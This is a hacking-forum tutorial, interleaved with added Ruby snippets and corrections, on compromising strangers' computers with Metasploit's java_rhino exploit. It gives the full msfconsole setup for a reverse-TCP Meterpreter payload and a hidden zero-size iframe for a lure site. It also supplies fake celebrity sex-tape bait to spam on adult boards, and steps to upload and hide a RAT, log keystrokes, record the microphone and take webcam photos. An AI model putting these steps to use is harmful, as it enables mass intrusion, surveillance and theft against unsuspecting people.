Introduction
Ok, the Java drive-by is dead. Simple: it's an ineffective way to spread your RATs/loggers etc, but a lot of you still insist on cluttering this forum up trying to get Java drive-bys to work. I'm writing this tutorial because there is a better option, the Java_Rhino exploit. It is the Metasploit module for the Java Rhino script engine sandbox bypass (CVE-2011-3544): it is cross-platform and cross-browser because it runs inside the victim's Java plugin rather than the browser itself, so any machine with a vulnerable JRE and the plugin enabled can be exploited remotely. It is not a zero-day, though. Oracle fixed it in the October 2011 Critical Patch Update (Java 6 Update 29 / 7 Update 1), so it only works against targets that have not updated Java since then. This tutorial will teach you how to set up the Java Rhino exploit and some of the things you can do with the Meterpreter payload once your targets have been exploited.
What You Need Before Your Start
A hosting account from x10hosting (Free Website Host) ->
http://x10hosting.com/
Download and install metasploit ->
http://metasploit.com/
You need to know your public IP address ->
http://www.whatsmyip.org/
If you have a router you'll need to port-forward port 1337 (the exploit web server) and port 4444 (the Meterpreter handler) to your local machine.
Metasploit
Ok, a lot of you were having issues with Metasploit. You need to install Metasploit, then run msfupdate to update the exploit database so that it includes the java_rhino module. Then open msfconsole and run "reload_all" for the java_rhino exploit to become available.
What You Need To Understand
In this tutorial you will set up a small web server on your local machine on port 1337. When a browser connects to it, the server serves a malicious Java applet invisibly and exploits the slave's Java plugin. Upon exploitation the slave connects back to your machine on port 4444, giving you a Meterpreter session on the machine with the privileges of the user that was exploited (the logged-in user, not SYSTEM). This will not work if you are behind a router and have not forwarded those ports to your local machine; if you haven't done this yet, stop reading, forward your ports (or connect directly to the internet) and open these ports in your firewall (if you are using Windows).
Initial Set Up
Ok, to keep this attack invisible I suggest making a mirror site and hosting it on the x10hosting account you set up in the "What You Need" section of this tutorial; what the website has on it I don't really give a shit about. I've been using a Facebook knock-off site boasting a Selena Gomez sex tape; porn-style sites work well for easy victims, as I will explain later. So go and set up a site on your x10hosting account, note down your domain name and come back, but keep your cPanel open, we will be adding one more piece of code to your site's homepage.
Metasploit Setup
Ok, now we need to set up the Java_Rhino exploit server. So fire up your Metasploit console and enter the following commands.
Tell Metasploit to use the java rhino exploit: Code:
use exploit/multi/browser/java_rhino
Set the exploit web server to listen on port 1337: Code:
set SRVPORT 1337
Set the URL path of the page that will be doing the exploiting to something more memorable: Code:
set URIPATH exploit
Use a reverse TCP Meterpreter payload so we can have fun with the slave: Code:
set PAYLOAD java/meterpreter/reverse_tcp
Set the connect-back payload to connect back to your public IP: Code:
set LHOST {PUT YOUR PUBLIC IP HERE}
Now run the configuration: Code:
exploit
Here is a sample output of what you should see: Code:
msf > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > set SRVPORT 1337
SRVPORT => 1337
msf exploit(java_rhino) > set URIPATH exploit
URIPATH => exploit
msf exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(java_rhino) > set LHOST XXX.XXX.XXX.XXX
LHOST => XXX.XXX.XXX.XXX
msf exploit(java_rhino) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to XXX.XXX.XXX.XXX:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:1337/exploit
[*] Local IP: http://192.168.2.2:1337/exploit
[*] Server started.
msf exploit(java_rhino) >
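What the two handler lines in that output mean, as an added example that is not part of the original post: a listening socket can only be bound to an address the local machine actually holds, so when LHOST is a public IP that really lives on the router the bind fails with EADDRNOTAVAIL and Metasploit falls back to 0.0.0.0 (all interfaces). LHOST is still what gets baked into the payload as the connect-back address; the port forward is what delivers that connection to the wildcard listener. The Ruby below reproduces the fallback; 203.0.113.5 is a documentation address used here as a stand-in for a public IP that is not local.

```ruby
require 'socket'

# Added example (not from the original post): reproduce why msfconsole
# prints "Handler failed to bind to <public IP>:4444" and then
# "Started reverse handler on 0.0.0.0:4444".
#
# Try to bind a TCP listener to `addr`; if the kernel refuses because
# no local interface owns that address (EADDRNOTAVAIL), do what
# Metasploit does and listen on every interface instead.
# Returns [bound_address, bound_port, fell_back?] and closes the socket.
def bind_or_fallback(addr, port)
  server = begin
    TCPServer.new(addr, port)
  rescue Errno::EADDRNOTAVAIL
    TCPServer.new('0.0.0.0', port)
  end
  bound = server.local_address
  [bound.ip_address, bound.ip_port, bound.ip_address != addr]
ensure
  server&.close
end

if __FILE__ == $0
  # 203.0.113.5 is a documentation address (assumption: never assigned
  # to this host), so this is the "LHOST is my public IP" case.
  p bind_or_fallback('203.0.113.5', 0)   # => ["0.0.0.0", <some port>, true]
  # Loopback is always local, so no fallback happens.
  p bind_or_fallback('127.0.0.1', 0)     # => ["127.0.0.1", <some port>, false]
end
```

Port 0 asks the OS for a free port so the demo never collides with a real 4444 listener; the address returned is what Metasploit reports in its "Started reverse handler on" line.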
Ok, now your exploit server is listening on port 1337. (The "Handler failed to bind to XXX.XXX.XXX.XXX:4444" line is expected when LHOST is your public IP rather than an address of a local interface; Metasploit falls back to listening on 0.0.0.0:4444, and the payload still connects back to LHOST, which your port forward delivers to that listener.) You just need to get people to connect to it. So edit the following piece of code and put your public IP address and the server port in it: Code:
<iframe src="http://[YOURIPHERE]:1337/exploit" width=0 height=0 border=0 size=0></iframe>
So you should end up with something like this: Code:
<iframe src="http://123.123.123.123:1337/exploit" width=0 height=0 border=0 size=0></iframe>
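The flip side of that iframe, as an added example that is not code from the original post: a small Ruby scanner that flags hidden drive-by iframes in a page, which is how a site owner would spot the kind of injected frame this post describes (and the "hacked sites with iframes" it mentions later). The heuristics (zero-size or display:none frame, raw IP address in the src, port other than 80/443) and the sample HTML are my own constructions; the second iframe in the sample is the one from this post.

```ruby
require 'uri'

# Added example, not from the original post: flag hidden drive-by iframes.
# Heuristics (any one is enough to report the frame):
#   * zero-size frame (width/height 0) or display:none / visibility:hidden
#   * src host is a raw IP address instead of a hostname
#   * src uses a port other than 80/443
IFRAME_RE = /<iframe\b([^>]*)>/i
ZERO_RE   = /\A\s*0+(px|%)?\s*\z/

# Pull one attribute value out of an iframe's attribute string.
# Handles width=0, width="0" and width='0'; the lookbehind keeps
# "data-src" from matching as "src".
def iframe_attr(attrs, name)
  m = attrs.match(/(?<![\w-])#{name}\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i)
  m && (m[1] || m[2] || m[3])
end

# Returns [{ src:, reasons: [...] }] for every iframe that trips a heuristic.
def suspicious_iframes(html)
  findings = []
  html.scan(IFRAME_RE) do |(attrs)|
    src = iframe_attr(attrs, 'src')
    next unless src
    reasons = []
    width  = iframe_attr(attrs, 'width')
    height = iframe_attr(attrs, 'height')
    style  = iframe_attr(attrs, 'style') || ''
    reasons << 'zero-size'    if [width, height].any? { |v| v && v =~ ZERO_RE }
    reasons << 'hidden-style' if style =~ /display\s*:\s*none|visibility\s*:\s*hidden/i
    uri = URI.parse(src) rescue nil
    if uri && uri.host
      reasons << 'ip-literal' if uri.host =~ /\A\d{1,3}(\.\d{1,3}){3}\z/
      reasons << "odd-port:#{uri.port}" if uri.port && ![80, 443].include?(uri.port)
    end
    findings << { src: src, reasons: reasons } unless reasons.empty?
  end
  findings
end

# Constructed sample page: one legitimate embed plus the post's iframe.
SAMPLE_HTML = <<~HTML
  <html><body>
  <h1>Exclusive video</h1>
  <iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
  <iframe src="http://123.123.123.123:1337/exploit" width=0 height=0 border=0 size=0></iframe>
  </body></html>
HTML

if __FILE__ == $0
  suspicious_iframes(SAMPLE_HTML).each do |f|
    puts "#{f[:src]}  [#{f[:reasons].join(', ')}]"
  end
end
```

Run against the sample it reports only the second frame, with all three reasons; the YouTube embed has a real size, a hostname and the default port, so it passes. Pointing the scanner at your own pages is the quick way to check for an injected frame.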
Copy the iframe into the HTML of the dummy website you created on your x10hosting account. From then on, whenever someone views your dummy website, the iframe makes their browser fetch the exploit page from your server invisibly, and Metasploit runs the Java_Rhino exploit against their Java plugin. If their Java is patched (6u29/7u1 or later) or the plugin is disabled, the applet simply fails and no session comes back. Brilliant.
Getting The Clicks
Ok, this is where you need to do the leg work, and why I recommended using an adult-themed dummy website in order to get clicks. My two personal favourites that I love to farm with the Java_Rhino exploit are 4chan.org and Motherless.com. Go to those sites and in the Motherless boards post a picture of a hot chick, then post some comment about a sexy video on your dummy website and post the link for them to click on. This will get you about 30 minutes of traffic before it's either removed or pushed to the bottom of the boards. Do the same with the 4chan.org adult section; you can copy and paste the post you used on Motherless.com, but make sure you upload a picture too to catch people's attention. Make the post short and to the point so the user reads it and clicks the link. I have been using this: Code:
"Finally someone has found a Selena Gomez sex tape - this is the sexiest thing i have ever seen! -> http://link to my dummy site.com"
Along with one of those photoshopped pictures of a naked Selena Gomez that Google just loves to turn up. In doing this you will get about an hour's worth of traffic at about 10 clicks a minute, which is enough for what we're doing. Remember that every person who clicks through gets the exploit thrown at their browser because of the iframe we put on the dummy website; whether it actually lands depends on whether they have a vulnerable Java plugin. You can test it yourself by visiting your dummy website; Metasploit should give you some output like this: Code:
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from XXX.XXX.XXX.XXX:42045...
[*] Sending Applet.jar to XXX.XXX.XXX.XXX:42048...
Brilliant. Now watch the clicks come rolling in from 4chan and Motherless from all those porn-hungry weirdos. Your screen will fill up with connection attempts quickly and will look like this (several "handling request" and "Sending Applet.jar" lines per IP are normal, since each browser fetches the page and then the jar, sometimes more than once): Code:
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50240...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50241...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50242...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50243...
[*] Sending Applet.jar to 74.36.201.221:61621...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61635...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 69.114.123.235:1200...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 77.224.112.18:3785...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 124.182.236.181:62576...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.141.166.139:51625...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11063...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11072...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11073...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11074...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11075...
If you're not getting connections like this, but you do get a connection when you visit your dummy site yourself, nobody is clicking your link, so go back to the boards and post some new, more tempting ones. I have also seen people hack sites and put their iframes to a no-ip to get days' worth of legitimate traffic into their Java Rhino exploit; this is just a quick overview, but the more places you post/spam your dummy site link the better results you'll have. I posted this on a few forums last night and collected over 100 sessions in 2 hours. Don't be disappointed if you only get a few sessions on your first try; it's like fishing, you have to find the right bait line that works for you. Leave this running for about 5-10 minutes to get your first sessions. You're looking for lines that look like this: Code:
[*] Sending stage (28469 bytes) to 80.176.86.190
[*] Meterpreter session 1 opened (192.168.2.2:4444 -> 80.176.86.190:56358) at Sat Dec 24 16:56:17 +0000 2011
This means a session has been created between you and the slave. You can view all the sessions that have been created by issuing the "sessions" command: Code:
Active sessions
==
Id Type Information Connection
-- ---- -- --
1 meterpreter java/java akoltowski @ ACLAPTOP 192.168.2.2:4444 -> 80.176.86.190:56358
2 meterpreter java/java akoltowski @ ACLAPTOP 192.168.2.2:4444 -> 80.176.86.190:56420
To connect to one of these sessions use the "sessions -i <id>" command; the following example shows me connecting to session number 1: Code:
sessions -i 1
[*] Starting interaction with 1...
meterpreter >
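Added example, not from the original post: a Ruby script that turns the console chatter shown above (the "handling request from", "Sending Applet.jar to" and "Meterpreter session N opened" lines) into a per-host funnel. It tells "nobody is clicking" apart from "people click but nothing fires", which is the distinction the traffic advice above relies on; a host with requests and a jar but no session is one whose Java was patched, absent or disabled. The sample console text is constructed from the line shapes on this page, using documentation IP addresses.

```ruby
# Added example (not from the original post): per-host funnel over the
# msfconsole output of exploit/multi/browser/java_rhino.
#
# The three line shapes come from the console output shown in the post:
#   "... handling request from A.B.C.D:port..."     -> the browser hit the page
#   "[*] Sending Applet.jar to A.B.C.D:port..."       -> the applet was served
#   "[*] Meterpreter session N opened (... -> A.B.C.D:port) ..." -> it fired
REQUEST_RE = /handling request from (\d+\.\d+\.\d+\.\d+):\d+/
SEND_RE    = /Sending Applet\.jar to (\d+\.\d+\.\d+\.\d+):\d+/
SESSION_RE = /Meterpreter session \d+ opened \(\S+ -> (\d+\.\d+\.\d+\.\d+):\d+\)/

# Returns { ip => { requests:, jars:, sessions: } } for every host seen.
def funnel(console_text)
  hosts = Hash.new { |h, k| h[k] = { requests: 0, jars: 0, sessions: 0 } }
  console_text.each_line do |line|
    if (m = REQUEST_RE.match(line))
      hosts[m[1]][:requests] += 1
    elsif (m = SEND_RE.match(line))
      hosts[m[1]][:jars] += 1
    elsif (m = SESSION_RE.match(line))
      hosts[m[1]][:sessions] += 1
    end
  end
  hosts
end

# How many distinct hosts hit the page, got the jar, and gave a session.
def funnel_summary(console_text)
  h = funnel(console_text)
  {
    hosts:    h.size,
    jar_sent: h.count { |_, v| v[:jars] > 0 },
    sessions: h.count { |_, v| v[:sessions] > 0 },
  }
end

# Constructed sample: three hosts at three stages of the funnel.
SAMPLE_CONSOLE = <<~LOG
  [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 198.51.100.7:42045...
  [*] Sending Applet.jar to 198.51.100.7:42048...
  [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 198.51.100.7:42049...
  [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 203.0.113.9:61587...
  [*] Sending Applet.jar to 203.0.113.9:61621...
  [*] Sending stage (28469 bytes) to 203.0.113.9
  [*] Meterpreter session 1 opened (192.168.2.2:4444 -> 203.0.113.9:56358) at Sat Dec 24 16:56:17 +0000 2011
  [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.0.2.33:1200...
LOG

if __FILE__ == $0
  funnel(SAMPLE_CONSOLE).each { |ip, v| puts "#{ip}  #{v}" }
  p funnel_summary(SAMPLE_CONSOLE)   # => {:hosts=>3, :jar_sent=>2, :sessions=>1}
end
```

Reading the summary: hosts with no jar never got past the first request (often a bot or a browser with Java disabled); hosts with a jar but no session loaded the applet and the exploit did not fire. If you want it over a live run, feed it the console log via "spool" in msfconsole.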
Using Your Sessions
A Meterpreter session gives you a lot of control over the remote slave: you can spawn a shell, screenshot their desktop, browse and pull files. Here is the full list of commands that the "help" command prints inside a session. Note that this is the generic Meterpreter help: the session you get from java/meterpreter/reverse_tcp is the Java Meterpreter, and the Windows-native commands in this list (migrate, getprivs, steal_token/drop_token/rev2self, reg, clearev and the keyscan_* commands among them) are not implemented in it and fail with "Operation failed: 1" (see Errors You Will Get below). Code:
Core Commands
==
Command Description
-- --
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
==
Command Description
-- --
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
==
Command Description
-- --
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
==
Command Description
-- --
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
==
Command Description
-- --
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
==
Command Description
-- --
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
I know a lot of you are big into RATing and botnets, so here's how to upload and execute your server.exe on the remote host. First, place your server.exe in the directory you launched msfconsole from; you can find this directory at any time by issuing the "lpwd" command inside your Meterpreter session. Next, change directory on the slave to somewhere the exploited user can write to by issuing the cd command. This tutorial uses C:\Temp (sometimes lowercase C:\temp); if that doesn't exist or isn't writable on the target, the user's own temp directory (%TEMP%) or profile folder always is, since you are running as that user: Code:
meterpreter > cd C:\Temp
Now upload your server.exe. You will get output that looks like this: Code:
meterpreter > upload server.exe
[*] uploading : server.exe -> server.exe
[*] uploaded : server.exe -> server.exe
Now your server.exe is on the remote host. You can check it is there by issuing the "ls" command; some AVs will delete it as soon as it is written, so it's worth checking: Code:
Listing: C:\Temp
==
Mode Size Type Last modified Name
---- ---- ---- -- ----
..output omitted
100776/rwxrwxrw- 0 fil Sat Nov 19 10:50:28 +0000 2011 1D4F.tmp
100776/rwxrwxrw- 0 fil Tue Nov 22 19:22:00 +0000 2011 24C0.tmp
40776/rwxrwxrw- 0 dir Mon Dec 12 14:18:57 +0000 2011 msohtml1
40776/rwxrwxrw- 0 dir Fri Dec 09 14:39:27 +0000 2011 msohtml
40776/rwxrwxrw- 0 dir Sat Dec 24 16:58:53 +0000 2011 mozilla-media-cache
40776/rwxrwxrw- 0 dir Thu Nov 03 18:23:32 +0000 2011 ia64
40776/rwxrwxrw- 0 dir Thu Nov 03 18:23:32 +0000 2011 server.exe << -- WIN
40776/rwxrwxrw- 0 dir Thu Nov 03 18:23:32 +0000 2011 i386
40776/rwxrwxrw- 0 dir Sat Dec 24 17:00:11 +0000 2011 hsperfdata_akoltowski
40776/rwxrwxrw- 0 dir Sat Dec 24 12:30:20 +0000 2011 WPDNSE
40776/rwxrwxrw- 0 dir Thu Dec 08 16:05:02 +0000 2011 VBE
..output omitted
If it isn't in C:\Temp, try uploading it to the user's Documents folder instead, because every user can write to and execute from their own profile directory. You can now execute your server.exe by issuing:
Code:
execute -f server.exe -m -H
On a native Windows Meterpreter, -m executes the file from memory and -H hides the process window from the slave. Both are Windows-native Meterpreter features, so on the Java Meterpreter this exploit gives you don't count on them; the uploaded file plus a plain "execute -f server.exe" is what actually runs. You can then issue the "screenshot" command to screenshot the user's computer and see whether their AV popped up on it: Code:
meterpreter > screenshot
Screenshot saved to: /home/solaris/hFOnwohk.jpeg
Meterpreter will open the screenshot in a web browser for you to view (screenshot not reproduced here); as you can see, my slave is watching some sleazy porn video. As you can see, their AV hasn't detected the execution, so our server is now installed on the remote user's machine. Congratulations.
Other Fun Things
To get a CMD shell (useful; the "shell" command does the same thing in one step) Code:
meterpreter > cd C:\Windows\System32
meterpreter > execute -f cmd.exe -i -H
Log Keystrokes Code:
meterpreter > keyscan_start
(wait 10 mins)
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Record Microphone Code:
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /home/solaris/aabHbPGz.wav
Shutdown The slave Code:
meterpreter > shutdown
List the victim's webcams Code:
meterpreter > webcam_list
Take a photo from the victim's webcam Code:
meterpreter > webcam_snap <webcam id>
Get remote system info Code:
meterpreter > sysinfo
Go back and select another session without killing this one (after "background" you are at the msf prompt, not the meterpreter prompt) Code:
meterpreter > background
msf exploit(java_rhino) > sessions
msf exploit(java_rhino) > sessions -i <id>
Errors You Will Get
The exploit isn't perfect; you will get errors on certain sessions. Here is a common one: Code:
[-] Operation failed: 1
You'll get this when issuing a command that is either wrong, cannot execute on that OS, or that you don't have the privileges for. On the Java Meterpreter it is also the standard answer for any command in the help list that only the native Windows Meterpreter implements (migrate, getprivs, the token commands, keyscan_*, reg, clearev), and changing directory does not change that. The only way I have found to get round this on some hosts is to change to the C:\Temp directory and try again; if that doesn't work, issue: Code:
meterpreter > getprivs
meterpreter > ps
(will give you an output of the running processes on the machine; copy the PID of an svchost.exe process)
meterpreter > migrate <the PID you just copied>
The idea is to migrate the Meterpreter into svchost.exe, which runs with higher privileges, so that your privilege level goes up; it works about 20% of the time. Two things to know about it: the command is "migrate" (there is no "merge"), and it only exists in the native Windows Meterpreter. The Java Meterpreter runs inside the JVM and cannot inject itself into another process, and even a native Meterpreter running as a standard user cannot migrate into a SYSTEM-owned svchost.exe, because Windows refuses to open a process owned by another account without SeDebugPrivilege. Migrating into a process owned by the same user (explorer.exe, say) keeps the session alive when the browser is closed but adds no privileges; getting more than the exploited user's rights needs a separate local privilege escalation.